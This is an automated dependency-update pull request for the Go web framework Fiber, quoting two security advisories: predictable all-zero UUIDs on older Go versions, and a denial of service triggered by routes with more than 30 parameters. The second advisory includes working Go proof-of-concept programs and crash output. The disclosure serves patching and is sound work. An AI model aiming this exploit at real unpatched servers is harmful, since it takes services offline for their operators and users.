chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/gofiber/fiber/v2	v2.52.10 → v2.52.12

GitHub Vulnerability Alerts

CVE-2025-66630

Fiber v2 contains an internal vendored copy of gofiber/utils, and its functions UUIDv4() and UUID() inherit the same critical weakness described in the upstream advisory. On Go versions prior to 1.24, the underlying crypto/rand implementation can return an error if secure randomness cannot be obtained. In such cases, these Fiber v2 UUID functions silently fall back to generating predictable values — the all-zero UUID 00000000-0000-0000-0000-000000000000.

On Go 1.24+, the language guarantees that crypto/rand no longer returns an error (it will block or panic instead), so this vulnerability primarily affects Fiber v2 users running Go 1.23 or earlier, which Fiber v2 officially supports.

Because no error is returned by the Fiber v2 UUID functions, application code may unknowingly rely on predictable, repeated, or low-entropy identifiers in security-critical pathways. This is especially impactful because many Fiber v2 middleware components (session middleware, CSRF, rate limiting, request-ID generation, etc.) default to using utils.UUIDv4().

Impact includes, but is not limited to:

• Session fixation or hijacking (predictable session IDs)
• CSRF token forgery or bypass
• Authentication replay / token prediction
• Potential denial-of-service (DoS): if the zero UUID is generated, key-based structures (sessions, rate-limits, caches, CSRF stores) may collapse into a single shared key, causing overwrites, lock contention, or state corruption
• Request-ID collisions, undermining logging and trace integrity
• General compromise of confidentiality, integrity, and authorization logic relying on UUIDs for uniqueness or secrecy

All Fiber v2 versions containing the internal utils.UUIDv4() / utils.UUID() implementation are affected when running on Go <1.24. No patched Fiber v2 release currently exists.

---

Suggested Mitigations / Workarounds

Update to the latest version of Fiber v2.

---

Likelihood / Environmental Factors

It’s important to note that entropy exhaustion on modern Linux systems is extremely rare, as the kernel’s CSPRNG is resilient and non-blocking. However, entropy-source failures — where crypto/rand cannot read from its underlying provider — are significantly more likely in certain environments.

This includes containerized deployments, restricted sandboxes, misconfigured systems lacking read access to /dev/urandom or platform-equivalent sources, chrooted or jailed environments, embedded devices, or systems with non-standard or degraded randomness providers. On Go <1.24, such failures cause crypto/rand to return an error, which the Fiber v2 UUID functions currently treat as a signal to silently generate predictable UUIDs, including the zero UUID. This silent fallback is the root cause of the vulnerability.

---

References

• Upstream advisory for gofiber/utils: GHSA-m98w-cqp3-qcqr

• Source repositories:

  • github.com/gofiber/fiber
  • github.com/gofiber/utils

---

Credits / Reporter

Reported by @​sixcolors (Fiber Maintainer / Security Team)

CVE-2026-25882

A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.

Affected Versions

• Fiber v3.0.0-rc.3 and earlier v3 releases
• Fiber v2.52.10 and potentially all v2 releases (confirmed exploitable)
• Both versions share the same vulnerable routing implementation

Vulnerability Details

Root Cause

Both Fiber v2 and v3 define a fixed-size parameter array in ctx.go:

const maxParams = 30

type DefaultCtx struct {
    values [maxParams]string  // Fixed 30-element array
    // ...
}

The router.go register() function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in path.go performs an unbounded write:

• v3: path.go:514
• v2: path.go:516

// path.go:514 - NO BOUNDS CHECKING
params[paramsIterator] = path[:i]

When paramsIterator >= 30, this triggers:

panic: runtime error: index out of range [30] with length 30

Attack Scenario

1. Application registers route with >30 parameters (e.g., via code or dynamic routing):

   app.Get("/api/:p1/:p2/:p3/.../p35", handler)

2. Attacker sends matching HTTP request:

   curl http://target/api/v1/v2/v3/.../v35

3. Server crashes during request processing with runtime panic

Proof of Concept

For Fiber v3

package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v3"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9999")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9999/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:514 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output:

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:514 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v3.(*routeParser).getMatch(...)
	/path/to/fiber/path.go:514
github.com/gofiber/fiber/v3.(*Route).match(...)
	/path/to/fiber/router.go:89
github.com/gofiber/fiber/v3.(*App).next(...)
	/path/to/fiber/router.go:142

For Fiber v2

package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v2"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c *fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9998")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9998/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:516 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output (v2):

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:516 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v2.(*routeParser).getMatch(...)
	/path/to/fiber/v2@​v2.52.10/path.go:512
github.com/gofiber/fiber/v2.(*Route).match(...)
	/path/to/fiber/v2@​v2.52.10/router.go:84
github.com/gofiber/fiber/v2.(*App).next(...)
	/path/to/fiber/v2@​v2.52.10/router.go:127

Impact

Exploitation Requirements

• No authentication required
• Single HTTP request triggers crash
• Trivially scriptable for sustained DoS
• Works against any route with >30 parameters

Real-World Impact

• Public APIs: Remote DoS attacks on vulnerable endpoints
• Microservices: Cascade failures if vulnerable service is critical
• Auto-scaling: Repeated crashes prevent proper recovery
• Monitoring: Log flooding and alert fatigue

Likelihood

HIGH - Exploitation requires only:

• Knowledge of route structure (often public in APIs)
• Standard HTTP client (curl, browser, etc.)
• Single malformed request

Workarounds

Until patched, users should:

1. Audit Routes: Ensure all routes have ≤30 parameters

   # Search for potential issues
   grep -r "/:.*/:.*/:.*" . | grep -v node_modules

2. Disable Dynamic Routing: If programmatically registering routes, validate parameter count:

   paramCount := strings.Count(route, ":")
   if paramCount > 30 {
       log.Fatal("Route exceeds maxParams")
   }

3. Rate Limiting: Deploy aggressive rate limiting to mitigate DoS impact

4. Monitoring: Alert on panic patterns in application logs

Timeline

• 2024-12-24: Vulnerability discovered in v3 during PR #​3962 review
• 2024-12-25: Proof of concept confirmed exploitability in v3
• 2024-12-25: Vulnerability confirmed to also exist in v2 (same root cause)
• 2024-12-25: Security advisory created

References

• v3 Related PR: https://github.com/gofiber/fiber/pull/3962 (UpdateParam feature with defensive checks, doesn't fix root cause)
• Vulnerable Code Locations:
  • v3: path.go:514
  • v2: path.go:516

Credit

Discovered by: @​sixcolors (Fiber maintainer) and @​TheAspectDev

---

Release Notes

gofiber/fiber (github.com/gofiber/fiber/v2)

v2.52.12

Compare Source

🐛 Fixes

• CVE fix GHSA-mrq8-rjmw-wpq3

Full Changelog: gofiber/fiber@v2.52.11...v2.52.12

v2.52.11

Compare Source

What's Changed

🧹 Updates

• Improve mount functionality by @​gaby in #​3900

🐛 Bug Fixes

• Backport defensive copying fixes from #​3828 and #​3829 to v2 by @​sixcolors in #​3888
• Fixes and improvements for limiter middleware by @​gaby in #​3899

Full Changelog: gofiber/fiber@v2.52.10...v2.52.11

---

Configuration

📅 Schedule: Branch creation - "" in timezone Asia/Singapore, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.